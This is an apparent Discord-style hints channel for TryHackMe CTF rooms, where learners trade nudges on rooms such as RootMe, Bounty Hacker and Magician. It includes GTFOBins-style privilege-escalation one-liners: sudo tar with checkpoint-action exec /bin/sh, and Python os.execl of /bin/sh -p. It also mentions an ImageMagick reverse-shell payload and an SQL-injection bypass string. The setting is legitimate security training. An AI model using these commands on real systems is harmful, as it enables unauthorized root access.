You can also do /wp-themes/theme/404 if I'm not wrong
yes, that works for me
or /wp-content/theme/404.php
How do I execute an exe file provided for reverse engineering?
I am trying the REloaded challenge for reverse engineering in TryHackMe
I tried wine, but I can't run the file which I patched!!
Thanks
Can you run it in Windows?
I mostly use Linux, so I didn't try
I want it to run in my Parrot OS
I can't get you, bro
I patched it, but I want to make it run to get the flag
For the first two challenges it was done by strings and Ghidra decompiled code, so I didn't face any issue. But for the third one I need to patch and run
I patched it, but I'm having difficulty executing it
To be honest, in the great scheme of things, it may well be easier to set yourself up with a windows vm. It'll be useful for malware analysis and buffer overflow boxes as well. Or...you can actually find all the flags on that box without running anything.
Good idea, bro. But I don't have that much space on my PC. It was limited to only one OS in VirtualBox
No, bro
Having a Windows VM is always useful
Make sure you thoroughly review every document in the user's home directory. One will give you an idea of where to go.
Hello hello, I'm working on the room "Fuel". I've acquired a low-level shell, can anyone give me a hint on the privesc?
I've tried linpeas and 2 kernel exploits so far, which didn't work
yes the ignite room
Sure, PM
what is rear!?
I need help with Golden Eye. I only have one question left to complete the room, it's Task 2 Question 3
Inspect port 55007, what services is configured to use this port?
What do they mean by services?
Rare is the opposite of common
Ok thanks
That's a bug in the room
The correct question needs to be: what command do you use to communicate with the service on port 55007
oh ok thanks
Thanks, I've been banging my head on the keyboard for about a week now trying to figure that out
Yup, I came across the same thing and it was last week too lol
happy to help
How do I figure out "Based on the title returned to us, what do we think this port could be used for?" <- network services
nvm, I figured it out, I had to use ||telnet ip port||, but if there is another solution I would greatly appreciate knowing it :-)
Heya, I'm on the Wireshark 101 room, task 7 for ARP traffic. The question is "What 4 packets are Reply packets?" though I'm not exactly sure how to pinpoint reply packets specifically
Edit: solved. So there isn't any way to filter specifically for ARP replies; if I just filtered normally for "arp" and looked at the info section it's pretty self-explanatory and the replies stand out.
Can we ask hints for Enterprise?
Nope, 72 hours have not passed yet.
Spooky said he's more than happy to have hints now that it's blooded
Oh, so write-ups are allowed?
Not sure about writeups but you can submit an unlisted one to the room
Then it will get accepted or denied depending on if spooky wants writeups on ut or not
I would have to make the video public though, would that be ok?!
Hmm not sure @last nova you ok with this? ^^
Which layer of the TCP/IP model will traceroute run on by default (Windows)? Please help me, anyone
I'm on the Linux Backdoors (https://tryhackme.com/room/linuxbackdoors) room. I finished it, but I can't find pam_unix.so on my machine other than "/usr/lib/x86_64-linux-gnu/security/pam_unix.so", which is not editable. Is this normal?
Sure for write-ups
cc @balmy verge including video
It's Madness.
Hint for "The Impossible Challenge" room? I'm stuck at the start
Hint plz: Yara room, one question left: Task 11: Valhalla:
Besides .PHP, what other extension is recorded for this file?
Tried txt, .js, not correct!
Could I get a hint on Pickle Rick? I've found the login page and the username and right now I'm trying to do a brute-force attack via Burp and parsing the responses, but no luck so far. I thought there maybe was some easy SQLi to bypass the login and I've tried some variants of ' OR 1=1-- without success. Could I get a pointer? I'll give the brute force some more time. (beginner)
did you look in /assets?
Yes, but I missed the interesting info the first time I looked. Thank you, a good hint. Will get on it!
my notes on this one aren't super detailed, that might not be helpful
I need a little help on the Magician room. I've created a PNG using Metasploit (exploit/unix/fileformat/imagemagick_delegate) with my VPN IP and port. I upload that to the site (/etc/hosts is modified). But my nc listener isn't getting hit. Did I miss a step?
burp?
no
Downloaded the payload via wget
There should be an example in the research material
At least I never got it working properly with a single payload
So I did just get my Metasploit-generated PNG to call back and open a reverse shell, single payload
The only thing that I did differently was adding the msf option 'target = 1', which was not a visible option in msf, but was mentioned in a guide I read
I've found the flag and cleared the room. I've noticed that the output format varies on each load of the page. I'm trying to find all decoding methods. binary/ascii, base64, but not sure about the other two.
Anyone got Enterprise? I got a username and password but I'm stuck
@last nova Hey, just submitted the write-up, sorry if I butchered a lot of stuff
Just skimmed through it, looks good!
fyi, MSFVenom has -f exe-service (or exe-svc) for Unquoted Service Paths
Good to know, thank you! Again, it was a great box, looking forward to more
just gave you a shout-out https://twitter.com/NekoS3c/status/1373781812833583106
Did you have trouble with Enterprise? If so, check out @Cyb3ri0us video writeup ^-^
https://t.co/YKWzdMKENK
Ayy, really appreciate it man, thank you!!
Wow, didn't see that coming. Thanks for the videos
I'm so narrow-minded, didn't even click, derp
Can I get a hint on Brooklyn Nine Nine? Does it require stego?
Can I get a hint for Year Of The Fox? I'm not getting anything. I tried ||to enumerate the SMB and I found a share, but it is inaccessible with anonymous login. I found the username fox and I tried to brute-force the web and the SMB with hydra. Then with wfuzz I tried to search for some files or directories on the website, but nothing.||
UPDATE: ||I found a new username named rascal and am now trying to brute-force the web||
Hi there, just wanted to check about something in the "Introductory Networking" room.
In regards to Task 6 Ping, the final question asks "What switch would give you a more verbose output?". I've gone through 'man ping' and tried 'ping --help' and the only switch I can see (that seems to tick this box) is -v, but TryHackMe states it is the wrong answer.
Am I blind and missing something, or is it a bug?
Try refreshing the web page and resubmitting, and see if that does it.
I don't believe it. That fixed it
Thank you
Haha, it's an anti-brute-forcing technique
I haven't got far enough in the course to even know how to brute-force successfully
Is anyone having issues connecting over RDP on the room Enterprise? I've tried xfreerdp and Remmina but both do not work. Once xfreerdp worked but it was unusable. Now I am getting "Timeout waiting for activation". I've tried resetting the room but that has not helped
@edgy inlet @pine reef It's looking like it's a lack of resources, fix will be coming soon
Great, thank you for the fast reply
Thank you... OK, I thought the problem was with the VPN. And I deleted my favourite server
Anyone got a hint on Virtual Plant?
That's a brand new challenge room, so rule 13 applies here. No help/hints for 72 hours after release
@simple mountain Wanna do your messages for it?
Hi Hello! I'm working on jurassicpark and am having trouble finding the third flag.
I was hoping someone might be happy to nudge me in the right direction. I've found all the other flags with a simple find command
Do not provide or ask for help or hints for the Attacking ICS Plant #2 room until 24th March, 7pm (GMT)
hi
Hey guys, can someone help me with the Lunizz room?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Yeah ok, if someone can help me with the Lunizz room priv esc to the mason user it would be fantastic.
I finally found it after doing the Empire and What the Shell rooms :) Do you have by any chance any pointer regarding one last remaining question? I can't find the registry path queried by the attacker. I've looked at every RegQueryValue in ProcMon at the time given in the THM hint but none seems to fit the correct answer.
Good work digging that out! The only hint I can give you for that last one is that I found it by identifying what had to be the value before the space (by size) and then filtering on that. Even then I had to scroll through a fair few entries until I found the right one. Apart from being the right length it didn't really leap out at me. Unsatisfactory, and I'm sure there must be something more scientific, but unless someone's prepared to explain I haven't a clue
Ahah, I did try that also but got bored, will check that again with your method. I'll let you know. Thanks for replying!
Which path you are following? Is it the intended way or the unintended?
the intended one
I was checking the write-up to be sure and the path is the right one
Because most of us did it the other way, with the sudo vulnerability exploit... the reason being that decrypting the bcrypt was taking a long time using rockyou
No no, I did that part
I would like not to use the sudo exploit
I hist have a problem with the "lights" password
Oh...
just*
You got the Name of the place?
yeah
So that's the pass of mason
Yeah, but also no ahahaha. I know that's it, but it does give me "auth error"
Can I DM you?
In Bounty Hacker, I can't become root. I did connect via SSH
I'm stuck in priv esc
Ok. So what have you tried so far?
I did connect via SSH and I uploaded linpeas. I tried to crack id_rsa but it didn't work
Also there is the name of the tar vulnerability; I used GTFOBins but it's not working, just a shell
So you know you're exploiting the right thing
So maybe screenshot what you're doing and what's going wrong?
Then it's asking me for the sudo password
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
You mean this, right?
thanks
Finally, I got it right. It was not the first reg entry I would have thought of. Thanks a lot for your help
Thanks, now everything works
@stuck fractal The hash vs encryption question in task 3 must make you happy: https://tryhackme.com/room/passwordsecurity
Hey, are hints allowed for the new OSINT room ?
Yep, it's a walkthrough
I got a question on the OSINT one
42
Cool, I'm stuck on the ||pastebin|| part, would appreciate a little nudge
which room is this? I don't recall that off the top of my head. Don't have my notes in front of me, but I might be thinking of a different room
link?
ah, okay. Thanks. Sorry, I haven't done that one, I was thinking of a different room
Is it broken? It looked like the ||pastebin|| was removed from the site
I have no idea, maybe we could ping the creator?
@obsidian briar Hey, can we have a sanity check here? Seems like a few people are stuck on this part of your box. Are we missing something?!
Thanks
no the link is broken
I hope you got permission first.
Haha, it's your friend OK
Hi!! I'm going to fix this ASAP. Seems like the Wayback Machine did a whoopsie and deleted my archive. Gonna use some quick thinking and remake it ;)
It's funny because it was working a week ago when I demo'd it for some people, must've been unarchived really recently
Haha, it's ok, it's been a very fun box till now. Hopefully you can fix it real quick, and when you do please ping me here so I can continue the box
Hey, awesome! Give me a shout once you manage to resolve this and we'll look into a way of preventing this sort of thing happening again. We (as room testers) really try to avoid content that has pastebin/sites of that nature purely for that reason, but this looks to have been slightly overlooked
But yeah, gimme a shout once you get this sorted and I'll post it somewhere more permanent in lieu of relying on pastebin/etc
Hey!! I fixed it. I ended up putting a disclaimer in the txts. I think they got removed from the archive because they were categorized as illicit or something because of the nature of the fake emails in it (implying blackmail). They should be back up
Awesome stuff
@balmy verge @uneven bane @vague birch @glacial ember @rustic sphinx it should be fixed if you were stuck
Can I DM you real quick if you could spare the time please?
Absolutely!
Of course!
Great box, Thanks!
Thank you for being a part of it!
I'll make a video for it tomorrow, hopefully
Coolio!! There's a possibility of me changing the link to a more permanent place, but the methodology will be the same
On the ccpentesting room, task 20, final question there, syntax for smbmap. I'm wondering if the question prompt is outdated for the answer format. Looking at the number of asterisks, it doesn't match what I think it should be. Nothing I've tried so far has been valid.
How many asterisks are you off?
2 on each of the larger blocks. I've also tried surrounding each arg with single quotes, no dice
try double
yep, that's what it was. Thanks
np
Thanks so much for fixing it so quickly. Awesome box, I love OSINT!
No problem, I'm glad you enjoy it!!
Anyone know why the Network Services task 3 question on what sticks out is "Profiles"? Trying to understand why profiles is something that would stick out after performing an nmap scan or enum4linux scan..
All the other shares are defaults
Is this determined under the share enumeration portion of the enum4linux scan?
Is what determined?
The fact it's non default is not determined there, but that's where you're shown the share
So if you were familiar with default Windows shares, you would then know that the profiles share is not one of them?
Roger. Thanks for pointing me in the right direction. much appreciated!
Check the shadowban API. What is the value of "search"?
I got stuck on the above question from the KaffeeSec - SoMeSINT room
Any nudge would be much appreciated
I'm not sure we're allowed to help with this room yet
If any mod can confirm or deny, then I can give you a hint
Ok, sorry... I thought it was a walkthrough..
np..
If it is a walkthrough room, then my bad
Lemme check
It is a walkthrough room, my bad. Hints are allowed.
thanks jabba
@sand mesa did you use the tool that was hinted at in the description?
Yeah, but it is failing to search
thanks @stark reef
Shall I DM?
I said except using onesixtyone or smbclient, because you have to have a clue to use them while nmap shows nothing on those ports. Or maybe I'm wrong and you have to check everything (sure it is)
In room SteelMountain - completed the exploit & privesc for the no-MSF section, but I can't figure out one of the questions to get 100%. Had some ideas, but none of them are accepted. Anyone willing to share via DM? Thanks!
"What powershell -c command could we run to manually find out the service name? "
@opal vine Hey enigma, I'm at the final part of the rootme room. I managed to get the weird file, now I just need to get root.txt
I read somewhere that I need to exploit this SUID file. I tried looking around and got a python command, but it doesn't work though
OK, that's nice
There's a website that helps you exploit SUID called GTFOBins
https://gtfobins.github.io/
Search inside it for python
and do the commands in the SUID section
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
That seems right
What is the full path for the python SUID?
Are you sure you are not root rn?
by typing whoami
oh for fucks sake
It says I'm root LMAO ALL THIS TIME
Finally finished the room
I think I should write notes on it
Yup, that happened because the command gave you an sh shell instead of bash, and you can't see the current user
That's why you need to check what user you are after running such commands
Yup, those are really helpful
happy hacking
No worries, you can always hit me up
@glossy solar Just ask your question instead. Chances are most of us completed it
I managed to find out myself. Turned out I found the correct exploit (SQL injection) but for the wrong service, so I couldn't get the correct CVE
Ah, even better then
If it's a CTF, as a general rule not for 72 hrs
ESQY does the pins but I guess he must sleep sometimes, the fiend!
I need help.
thm.com/room/passwordsecurity Task 2 " What form of authentication is password-based authentication? "
Where can I get the info?
I dunno if I'm supposed to help you, but maybe read the task from the beginning
It was hiding in plain sight, guess I shouldn't skim anything
Not if you then go and ask for help
A lot of the time, no, THM doesn't require outside research for questions like that; they are there to prove you read and understood the text. If they require external answers they may say "research required"
(not a solid rule but fairly common)
Do not provide or ask for help or hints for the pyLon room until 27th March, 7pm (GMT)
The new pyLon room was tricky, well, back at it tomorrow I guess
Anyone up for a nudge on Tokyo Ghoul?
Which part are you at and what have you tried?
I think it's broken again
How so?
Edit: The links are definitely working, I think you're referring to the room. It's been temporarily taken down for reasons I'm not completely aware of and will be back up when that's resolved
yeah, the room is fine.
Loving pylon so far! TBC tomorrow...
Same here. I didn't get very far today before my kids started needing food again.
I'm working on the challenge in the uploadvulns room. I've made a small (<10kb) image file, when I attempt to upload it, I'm getting a 500 internal server error response back. Did I break the server, or is this expected behavior?
I've already intercepted the ||upload.js|| and removed the three checks there
I've also uploaded a txt file renamed as a jpg, and get back a 200 success, but so far, my manual and gobuster attempts to find it aren't revealing anything
Hm, okay. Uploading a 2kb valid jpg gets a 200 back. Still can't find it though
Okay, I'm an idiot. I was looking in the root path, not ||/content||. I haven't seen a way to make gobuster scan recursively. Does that feature exist?
I am finishing up the Crypto101 course and am stuck on the GPG challenge. I am trying to run /opt/john/run/gpg2john tryhackme.key > hash, but I get an error: "Error: No hash was generated for tryhackme.key, ensure that the input file contains a single private key only."
Any hints please?
Sorry, faithsec, I don't know. Haven't done that room.
That's on my plan for tomorrow
pyLon box moved to private but I can still reach it: ❯ ping 10.10.189.173 PING 10.10.189.173 (10.10.189.173) 56(84) bytes of data. 64 bytes from 10.10.189.173: icmp_seq=1 ttl=63 time=223 ms 64 bytes from 10.10.189.173: icmp_seq=2 ttl=63 time=647 ms 64 bytes from 10.10.189.173: icmp_seq=3 ttl=63 time=466 ms
No problem. I was WAY over-thinking it
Yeah, I do that too sometimes.
In the room Brooklyn-99,
When I run steghide extract -sf brooklyn99.jpg on the image, it returns "could not uncompress data. Compressed data is corrupted". Did I download the image wrong, or is there something else I'm doing wrong here?
Maybe you can try to re-download the image
Yeah, I tried using wget too, but it gave the same error
I downloaded it both by going to <Machine IP>/brooklyn99.jpg (where the source said it was being sourced from), and by doing wget http://<machine ip>/brooklyn99.jpg
the answer is in that paragraph :)
I tried "crack number of passwords".
nearly, replace the first word
Thanks for helping, but I still can't see what word it wants me to use.
The question is what rainbow tables are effective against, and as it says in the paragraph it says that it is effective when an attacker tries to crack a large number of passwords. In my head the answer then should've been "To crack a large number of passwords".
the answer is 4 words long, what are the last 4 words in your suspected answer :D
@obsidian briar Hey, just submitted my write-up
